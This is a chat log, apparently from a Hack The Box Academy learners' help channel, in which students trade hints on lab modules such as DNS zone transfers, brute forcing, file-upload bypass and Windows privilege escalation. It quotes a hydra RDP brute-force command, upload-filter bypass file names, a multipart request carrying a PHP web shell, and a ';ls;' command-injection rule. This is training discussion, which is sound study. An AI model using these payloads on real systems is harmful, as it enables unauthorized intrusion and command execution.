someone spoiled it in a forum i was in
why would that be hard
well hard is relative because i have never done it and if people are new to password attacks they will probably not have any experience with it like me
just use a windows vm for those
lmaooo
@dark carbon i guess we are on the same page, i wanna learn some cool hacking skills, rn all i have is time to learn it.
you should really exhaust your options before checking stuff like that.
i agree
Accept it
i did
yes, we need to understand which task requires what to investigate. i've another query, we dont have all tools in this target's section. how are we supposed to perform DF investigation?
Guys I've been struggling with this task for over 24hrs, it's the IDS/IPS module
There is a file named pipekatposhc2.pcap in the /home/htb-student/pcaps directory, which contains network traffic related to WMI execution. Add yet another content keyword right after the msg part of the rule with sid 2024233 within the local.rules file so that an alert is triggered and enter the specified payload as your answer. Answer format: C____e
with the tools you have on the target machine
you have everything you need to complete the skills assessment
have you read the article? it helps a lot with this question
Ahh it doesn't work on mobile
Active subdomain enum module on information gathering web edition. I'm not able to nslookup on inlanefreight.htb. I have enlisted it with the target IP in etc/hosts, what am I doing wrong?
which question is that?
can i ask the ques ? i have the path of Laudanum aspx web shell located on Pwnbox but i submit it, it alert wrong
did you include /xxx.aspx?
oh, i missed it, thanks
Nslookup doesn't take stuff out from etc/hosts. Need to put IP in the command
nslookup -type=NS <target_IP>
As in this way?
Submit the FQDN of the name server for inlanefreight.htb domain
Nslookup -type=NS inlanefreight.htb <targetIP>
^
๐
With that you tell nslookup to access inlanefreight.htb; you need to go through the IP
Or else it will take i think 1.1.1.1 dns server, which inlanefreight.htb can't be accessed from
Ahh okay thanks gotcha
A lot of tools won't look at etc/hosts or route properly, that's why it doesn't work just having it in the file
can i DM you about this?
it will rather use the default resolver configured on your system.
might not necessarily be 1.1.1.1 or even 8.8.8.8
How do they resolve the domain names that aren't known to the dns server then?
nslookup -type=any -query=AXFR inlanefreight.htb <target_IP> ns.inlanefreight.htb
This isn't working for me tho
Right sorry yes you are correct. Depends on what you configured. But many ppl default is 1.1.1.1.
you should really understand the commands you are issuing mate.
Well ofc it isnt. You are using the command wrong
I thought for looking up zone transfers we need to assign which nameserver it should query, isn't it so?
So you want to look for zone transfers in ns.inlanefreight.htb? Then why do you use inlanefreight.htb?
No, I am looking in inlanefreight.htb and using ns.inlanefreight.htb as its nameserver to query
Bro got that 2019 hakr ahh name (joke btw no offense)
You don't need to put another x.inlanefreight.htb in your command if you want to look for anything.
Just one is enough
Example
nslookup -type=ns ns.inlanefreight.htb <IP>
Or whatever other subdomain you want to use instead of ns. You don't need to specify any other nameservers since you already gave nslookup the 2 needed ones
So if you want to search for zone transfers
nslookup -type=any -query=axfr ns.inlanefreight.htb <IP>
Not all subdomains are zone transferable
can anyone help me with the module Password Attacks: Network and Services part 3? I have been running: hydra -L username.list -P password.list rdp://10.129.83.0 many times now, I can't find any legit usernames/passwords after a few hours
Looks like I also need to look back this topic in htb (it was confusing a little bit)
I prefer dig over nslookup
So here the IP should be of target machine or the IP of ns.inlanefreight.htb?
Idk which lab you speak about but you may try new wordlists
And isn't it weird to use username.list as it may take a lot of time
Target machine.
I think the lab asks to use that user/pass list, but I'll try another set of users
yeah, afaik nslookup is deprecated
inlanefreight.htb is the domain name you want to query.
10.129.40.151 is the IP address of the DNS server you're instructing nslookup to use to perform the query.
Example: i want to visit inlanefreight.htb but cant
But then i found a tunnel(target Ip) which leads me to the inlanefreight.htb
Same thing applies if you want to look for other subdomains
Since you already have access to inlanefreight.htb you have access to other subdomains in that module.
So for other subdomains you keep using the same tunnel (target IP which was given to you by the website)
That's just a rough example

Thanks
Oh I didn't know, if the lab asks just use it. Sadly I am in university rn so I can't look at the lab to help
Just maintain the wordlists you used from the previous question
No problem, do I need any other flags to slow the search down? Or run the command as is?
@dark carbon Step 1: Get a computer; Step 2: Learn to hack on Hack The Box Academy. It's up to you how you solve those steps but that's going to be the best recommendation. HTB Academy is a lightning track forward. Learning other ways honestly can waste years of your time.
Then grind.
And if your first impulse is to make excuses for why you can't get a computer or money for HTB Academy take it as your first introduction to applying the hacker mindset. You have a problem. It's up to you to find a solution to this. Ask your parents, school, job, whatever you need to do. Use your library's computer. If you have the will, you will find a way.
Thx
Welcome!
guys, i spawned the skill assessment for the windows priv esc module and i can't ping the ip for weeks
by default windows has ping turned off so you won't get a reply back
Try to scan it instead
Hi, I have been doing the Shells and Payloads | Skills Assessment section. For Host-1 and Host-2 enumeration, the username and password are given as "hints". But I feel that that information should have been provided in the question section. Why are they in hints? Can we find the password by ourselves by bruteforcing? Also, isn't there another module for password cracking? Then, why are we asked to do that in this module? Doesn't that diminish the purpose of this module?
well it's strange, i did try to scan it, and still nothing. i was able to do it normally like 2-3 weeks ago, but not now
Switch your vpn servers maybe.
use the -Pn argument in nmap when you are scanning
yes this helps thank you guys
The username and password for both the blog and tomcat can be found ||on one of those 4 machines||. You don't need any bruteforcing
||hello everyone, I want to ask about skill assessment II on active directory enumeration and attacks. why are the responder results on Linux hosts (foothold) and Windows different? On the Windows host, we can get new credentials, namely CT***. Why could that happen?||
because it's not a broadcast, it's a direct connection to that host only
thank you for the answer!
can anyone confirm that sharing badges functionality in the academy is actually working ?
Yes, it works perfectly for me
Argh I'm stuck at one question in the Windows Event Logs & Finding EVIL, question 3 at the skill assessment. Anyone here that could offer a hand? I identified the process that executed unmanaged powershell code in the question before, but I am at a loss of how to "determine the process that injected into the process that executed unmanaged PowerShell code. " Can anyone help me?
there's a specific event ID that you can filter for relating to process injection. https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon#events
ha! great, I found the solution. Thank you.
I am stuck in Password Attacks. Bruteforcing Sam user password with mutated list. I have tried hydra with maximum threads and crackmapexec, it is very slow.
I have tried bruteforcing both ftp as well as ssh
hello i'm stuck on this module https://academy.hackthebox.com/module/116/section/1512 , i verified all zone transfers but nothing, also i used subbrute on inlanefreight.htb but nothing, can someone help me pls
when you used subbrute, what did you get?
GM all! Working on the Responder module in the Starting Point and having some issues. Running kali, openvpn, and firefox on a VirtualBox VM and the NetNTLMv doesn't seem to be getting caught by Responder, despite the URL returning the same data as the Walkthrough. I'm guessing it's an issue with the OpenVPN tunnel from Kali VM through my Windows laptop?
I even did subbrute on this domain
make sure you've connected to the vpn and use responder to listen on the vpn's ip, anything else, ask in #starting-point
Hello, I'm stuck on the "FILE UPLOAD ATTACKS (Whitelist Filters)" module. I can't find the solution. I manage to upload the shell because I get a "File successfully uploaded" message, but I can't access it because I get a 404 error on the page. I tried the following:
||test.pHp%0a.jpg?cmd=id||
||test.pHp.jpg?cmd=id||
||test.pHp%0a.jpg?cmd=id||
No need to check with a public server: there's multiple things that may pop up, ns is only one of them
off topic, anyone know why i don't have permission to talk in general chat?
Thank you, got it going now. I appreciate it!
judging from the error you're getting, seems like you couldn't even access the uploaded file.
it's not all the extensions that can execute php code.
it should display another error iirc
Yet it was indeed uploaded correctly.
i dont quite remember but afaik you can bypass it alright but it wont exec
Hey, I just started "windows command line module". Should I go through the 'CMD' sections or can I start directly with powershell sections?
try and upload a simple php code that executes "hello world" or something
k
when it works you know that ext. can execute code
since it's blacklisted and whitelisted, you can just fuzz for allowed extensions as they display a different error: "Only Images Allowed", and then bypass the whitelist filter as shown in the section with every allowed extension till you find the executable one
plus those 00% ext don't work, look through them. the ext..ext ones work
Ok i will try this
Hello, I need help with the Web Server Pivoting with Rpivot. I cannot set up server.py. I'm using the Pwnbox. I'm getting an error with python2.7 and changed to python3, but every time I run python2.7 server.py --proxy-port 9050 --server-port 9999 --server-ip 0.0.0.0 I'm getting some kind of error that I need to install a module, which I install every time; then there is an error with the config.py file, afterwards it's hook.py etc.
that's trying really hard lol
lol
I've been stuck for 2 hours on a stupid question, it drives you crazy
I get you, even I was stuck on something stupid x)
https://academy.hackthebox.com/module/57/section/516
can i get help here I'm using cupp for a word list I'm doing what the hint says and using the filters to make the word list only contain special char etc and still not getting anywhere any tips?
@acoustic owl Sorry for tagging, i would love a hint of how much i should detail in the cupp tool if you remember (If it is wrong to tag you please tell me)
@soft cedar @crystal steeple I had found the solution from the start... except that the file needed to be ||URL encoded|| to be accessible in the browser..
The %20 in the file equals ||%2520|| in a URL.. So with that, it works: ||shell.phtml%2520.jpg?cmd=id||
Ty for your help
Enter as little data as possible. || Last name and first name and then test it ||
That's what I'm doing. after filtering I'm getting around 2300 passwords
I waited for hydra to try them all and nothing
I tried with capital letter and without
even tried adding the birthday
At the end you will be asked four questions. You don't know any keywords, but you should think about the remaining questions again.
I'm at the skill assessment trying to brute force the ssh
does it matter if i start the name with a capital letter like so "Harry" or not?
I don't know. But I wrote the name in this way: Firstname Lastname
solved , thank you
Alright, thanks.
My List: || [+] Saving dictionary to ***.txt, counting 5740 words ||
Can I get a hint on HTTP Attacks --> HTTP Response Splitting?
You taking the cwee path?
yes
Cool gl
Did you read the hint?
I can't send any picture idk why
read and follow #welcome then you can upload pictures
I see the hint. Just working on trying to get the initial xss. Trying to get a work around for the additional header that the target shows that the example doesnt
Read the hint carefully.
Then get the admin to visit the page.
Idk why i thought the username is harry because when i tried to ssh with that username it gave me a password attempt but that was not the case
I'm so dumb
now I'm in the using web proxy module - automatic modification. I practiced many times on the challenges above it, so it is about how to set specific settings to modify anything automatically. Now I'm in the exercise that says Exercise 2: Try adding a rule that automatically adds ;ls; when we click on Ping, by matching and replacing the request body of the Ping request. I don't know exactly what I should put in the Burp Suite settings (shown in this message): should I write the instructions in HTML format or in headers format?
intercept the outgoing request and check where to inject the command
Colleagues, good afternoon, I have a query in relation to this question: please enumerate the server carefully and look for the flag.txt file. Please submit the contents of this file in response. What I understand is that I have to change the permission, that's what I have in mind
brother you're gonna have to tell us what module and section you're working on
module Footprinting Skills Assessment Footprinting easy lab
scan; check what you can see
you don't generally need to change permission unless you get an id_rsa file
Peace be upon you
English
Arabic
#rules this is an english only server
ู ุชุฃูุฏ
Dude is trolling
Hey
Do we tag RULE BREAK?
@sly gulch Only
H4Z3COR3
Hello
Someone who can tell me how to do it
use the tools and techniques shown in the module
take it one step at a time; scan and enumerate
I think I need to add the private key to the attacking machine in order to gain access
I have listed with autorecon as such and well I have the information I want now I must perform the construction of the command
Where exactly are you stuck?
you don't need autorecon
good 'ole nmap will get you the initial info needed
Permission denied (publickey)
yes
you can find that using given info from the overview
reading the overview will give you a user's credentials with which you can log into one of the open services with
(where you can get the id_rsa file)
tried encoding special chars multiple times, and I still cant get a basic xss payload to run
hello , i have a dumb question, in most sections in windows privesc module, we escalate privesc to system admin privilege , what is the difference between local admin in that machine and system admin privilege?
trinity??
as a local admin can perform any operation in the machine no? what is the system level privilege is and where would we need it then
@fathom pendant trinity??
?
https://academy.hackthebox.com/module/112/section/1078 @rustic sage this is what you're working on yeah?
read the text carefully
system has higher privileges, it literally represents the system itself, used to carry out OS tasks and cannot be logged in normally
there's a username:password
You said footprinting easy lab?.
It's a password credential that I found in a hash that has been decrypted in the previous questions
hey could someone help me with attacking common services?
@fringe urchin yes
That password was from IPMI section. They have 0 relation
Do you have the credentials for easy lab?
the first question it says "What port is the FTP service running on?" i tried scanning all ports both udp and tcp. tried looking for dns using dig. but found nothing.
but why does having local admin privilege doesn't imply getting system level privilege?
i don't understand exactly the difference besides admin has an account and system doesn't
because they're two different accounts
makes sense
administrator is a standard local user account, system is a system account which is not controlled by a user
Example: local admin: the hamster living in my house
System admin: me
so ppl can configure their system account password to be different than the standard local admin user account?
no, you can't login as system, it doesn't have a password
@fringe urchin I thought
i implore you to read the text of this section
so in our own machine, windows machine, we can't escalate to system ?
Perfect, again, I'll read it because I don't want to be guided because the idea is to solve it on my own, anyway I'll read the guide again
there's no major digging again
there is no guide
I have a little problem, I can not use my RCE function given in the lesson : https://academy.hackthebox.com/module/145/section/1298
it literally, and explicitly, tells you in the easy assessment that there's a username:password that your colleagues found @rustic sage
you can with extra steps, the psexec.exe from Sysinternals can be used

the fact that they made this part EASIER and people still struggle lmao
i see , i think i understand now
fun fact, you used to either need to use the hint, or bruteforce the user/pass
so when they said in a section that getting system privilege in a domain-joined machine is basically getting foothold, because we would then be able to enumerate the domain which requires only system privilege and not local admin privilege?
Used to? Damn wtf. And they didn't cover bruteforcing till a few modules later
SOL; but tbh it was given in the hint ¯\_(ツ)_/¯
I don't understand
who uses hints of you have marcieLee and Xreous
no; getting system means having 'NT AUTHORITY\SYSTEM' on the machine
it's equivalent to getting root
You only needs valid domain creds to enumerate the domain, why you need system privileges ?
system permissions may have more permissions than domain creds :)
correct, the distinction is that since the local administrator account is a local account, it's not recognised by the domain and you can't use it within the domain, only on the machine itself. but if you're system, you're effectively using the machine account i.e MS01$, which is a valid domain account
i don't remember which section in the windows privesc, maybe in the intro, that said when getting a rev shell for example, and after escalating to system level, we would only then get the foothold
@fathom pendant could you help
thank you very much
That's true
try respawning the machine
i understand now the purpose of escalating to system
i did
sometimes it takes a few tries to get that port to show
there can be situations where you get system through an exploit without using a domain account
like three times
some people have needed to reset it like 8 times
also give it a few minutes after you reset it
Solved with chatgpt xd.
This port is tricky you may try to re-run Nmap to get it also avoid using fast scans
i used rustscan
do fast scans fuck it?
Yes each situation got different methodologies but if you have a valid domain creds you can enumerate the domain, if you got user that's not joined to domain you may need to do PE and get System then use it to enumerate the domain
If you use something like -T5, you could miss something
even nmap tells you not to use -T5
exactly, that's what i was asking about .
anyways thank you guys for the explanation !
yeh, but some external attacks makes you system automatically.
I think that was the point he was trying to make.
if you can be system: why not be system
btw the common exec methods such as psexec (from impacket this time) or wmiexec use services or the task scheduler to do so, so you'll get a system shell right away when logging in with those
guys i keep having transaction declined
it's the first time that it's happened to me in htb academy
message support
nothing can be done for you on the discord side brother
they told me it's the problem of the bank
then message your bank
literally nothing can be done for you on discord
Yes that's right
i want just to know if someone had this problem before
go back to support; tell them that your bank told you it was an issue on their end
i've heard there were some issues with some indian banks due to policy changes
i have had two subscriptions for one year now, on tryhackme and htb academy. this month something weird happened with the invoice of htb academy, the transaction just gets declined every time
then you need to work with both the bank and htb to get it resolved
¯\_(ツ)_/¯
literally no advice we can really give you except keep contacting them
thanks
All that support will be able to tell you is that the issuer marked the transactions as fraudulent, sorry. You'll need to use an alternative payment method
SQLMap Essentials "What's the contents of table flag10? (Case #10)" i dont want to put the command im using here bc spoilers, but im a bit lost. i know i need to intercept something request wise to see whats blocking sqlmap but im not seeing how to do it in burp suite or sqlmap. any ideas?
hey! still stuck on that assessment, can you please say if it's my command that's incorrect?
Nice
The windows one is great actually
okay i got the flag10 sqlmap essentials but i dont know how/why? ........ just used the post method and random-agent
but i got the flag, dont know why random agent got the flag. just bypassed whatever was blocking it? how could i have seen what was blocking it in the first place?
probably trial and error manually
Hi, I'm at the ADVANCED SQL INJECTIONS skill assessment. i found the sql injection and tried to brute force the reset password functionality to set the admin user password, but it says the generated key is not valid. I tried to brute force the "salt" but no luck. Am I on the right track or did i miss something?
Question for those who have done the Windows Privesc module: any time I try any of the service based privilege escalation attacks (i.e., replacing a service file with a malicious binary), I can get a shell but it either dies when the service errors out on the target or if I use a Meterpreter session I can get a shell but after the service errors out the meterpreter session is not responsive I just get errors saying the command send has timed out. So I'm wondering if I'm doing something wrong or that just expected considering the service will always error out, but if that's the case I'm struggling to see how this would be useful if you only have approximately 30 seconds before you lose your privileged shell
Instead of trying to get a reverse shell, what else can you do?
oh lots of things, I was just curious as to the example shown in the module. I tried with another payload when I created the binary and just used netcat and that had no issues. This is why I don't like using Metasploit, give me a simple reverse shell and I'm happy lol
yeah dm me if you need help
sometimes payloads don't work, sometimes they do; it's just never exactly a 100% success rate, you know, like how you tried a different payload and it worked for you
Hello, I'm stuck on the last question about IPMI in the FOOTPRINTING module. The hash value of the target system is always different, probably applying a salt, but I can't figure out the logic. How do I solve this hash value?
Look for 3rd party tools to find that pwd
Hey, I am stuck on the last question in HTB Academy DNS Footprinting: "What is the FQDN of the host where the last octet ends with 'x.x.x.203'?"
I suspect it is something I am doing wrong with the dig command or the dnsenum command. I read through all the other posts about this question on the htb forum and I understand that I have to use dig to query about the subdomains revealed with my first dig axfr command. However, when I try to interact with any of the subdomains using the dig command, I always get a "host unreachable" or a "timed out" error.
For example, here is the dig soa command I tried using with mail1.inlanefreight.htb:
dig soa mail1.inlanefreight.htb @10.129.18.201
;; communications error to 10.129.18.201#53: timed out
Can anyone help me out with this?
Try a 3rd party tool
@wooden perch You give the same answer to every question, shut up if you have no idea
Have you finished the module? I DID 
Trying to help
You may have finished but you're writing the same thing?
You will know if you follow the tip
@wooden perch There are no clues please don't answer me I don't want to argue anymore
If you check the previous messages about this question you will have the answer
Are you doing 3 at the same time or is it the overlap between the modules progress shown ?
is it worth spending the time on the macOS fundamentals module? It's not on the infosec fundamentals path or the CPTS path
(i fucking hate macos)
Try using a different DNS server (changing @10.129.18.201 to something like @8.8.8.8)
@solar grove u still need help??
if you still need help look into hashcat and look for a mode that will work for IPMI; if you still need help let me know
time to spend 2k to completion !
oh wait, my school has Macs lmao, I'll just use one of them
actually I'll probably need elevated privileges for that, which I definitely will not have on school Macs
If someone has done ADVANCED SQL INJECTIONS I need some help to get the login. MP me so I can share pretty much what I have done
Bro what happened to dread website
I'm doing the normal SQL injection module xD
Speak to your tutor about it, they might be open to it
And tell them to buy a University bundle at HTB!
But seriously, speak to them. They might be quite understanding
bros tryna secure a bag for himself and the company
If we get our schools on board we get something ?
absolutely no chance my school would let me do it
macs doodoo
oh, there are literally no macOS boxes on HTB
does any pentesting exam involve mac vms?
yup, no HTB boxes on Macs; not even possible to begin with since they are not open source
facts
so no one does (remote) pentesting on Mac or what
do I just not need to know macOS exploits
wow yeah, there's no macOS privesc module either
tough
interesting
that makes sense I guess
well that's a load off of my shoulders because I can't stand macOS
I outright refuse to use a Mac any more
at my last job everyone used Macs, so I had to as well, and it was my first time ever using a Mac
finna be my last time too
Yup same, I hated it
Eventually convinced them to let me use my own device, and then left a few months later to work at HTB full time 
real
can someone give advice for the file upload lab? I found the website ||./user_feedback_submissions/|| but I can't find my file!
If your file isn't in the location you thought it would be, how would you determine where it is?
I checked the PHP file, it's definitely in that directory
i would take a closer look at the upload page
ok thanks
it uploaded the thing successfully
I'd advise you to stop posting links to your challenge instances. Phrase your questions without posting the links
ok sorry
I found ||contact/user_feedback_submissions/240408_sc.png||
I uploaded a normal PNG file sc.png but it doesn't work, I can't find why
you are in which module ?
file upload attack lab
which section please?
https://academy.hackthebox.com/module/233/section/2554 Splunk not loading on these Zeek-related modules
not loading for my friend either
||
-----------------------------278366224330276505932534811969
Content-Disposition: form-data; name="uploadFile"; filename="ssc.pht.jpg"
Content-Type: image/jpeg
ÿØÿ
<?php system($_REQUEST['cmd']); ?>
-----------------------------278366224330276505932534811969--|| file upload lab: I found everything but my payload won't work, "Only images are allowed". I've tried with SVG magic bytes and it doesn't work, I'm not sure what I can do!
I've tried all the JPG magic bytes in ASCII and the PNG bytes in ASCII
sorry bro, wish I could help but I haven't done it
Have you tried any other file types?
@sleek moss https://book.hacktricks.xyz/pentesting-web/file-upload this can also help for ideas
i would recommend taking a look at this page here, there could be more than one magic byte per extension: https://en.wikipedia.org/wiki/List_of_file_signatures
I did, I tried all the accepted image file magic bytes in ASCII, it didn't work
you tried every file type with every combination of magic bytes?
@sleek moss I found the solution if you want
please give it to me
Are you at the same point? The file upload module?
Try to nudge instead of just pasting the solution if you can
It's mostly just CPTS + prerequisites.
From which section/module is that?
Please avoid posting screenshots including potential spoilers
It was not a spoiler
GlowGamer, if you are going to use the hash for authentication do not forget to use the appropriate argument/parameter in xfreerdp related to hashes and not to confuse it with a password
It included a user / pass on the command though.. am I missing something?
Those were provided by the exercise
okiedokie, then apologies
First, your argument is incorrect, second you must consider the registry value/path that is mentioned in the section
Yes please give solution
Look at your DM, I sent you what you should look for. If you put it together you will get it easily
I see, ok thank you
contradiction????
Tried to use tplmap for this module : https://academy.hackthebox.com/module/145/section/1344
I tried to install this lib from pip but it's giving me an error.
Downloaded the libs manually (requirements is not working, I don't know the reason), but cannot use the tool :(, it's not starting exploitation.
yeah I had the same issue, I found another tool on GitHub pretty much identical to it that actually worked
Which one :>?
Thanks for your help, I found the flag :).
nice
any idea why this is failing?
did you add it to your /etc/hosts file?
mods took it for themselves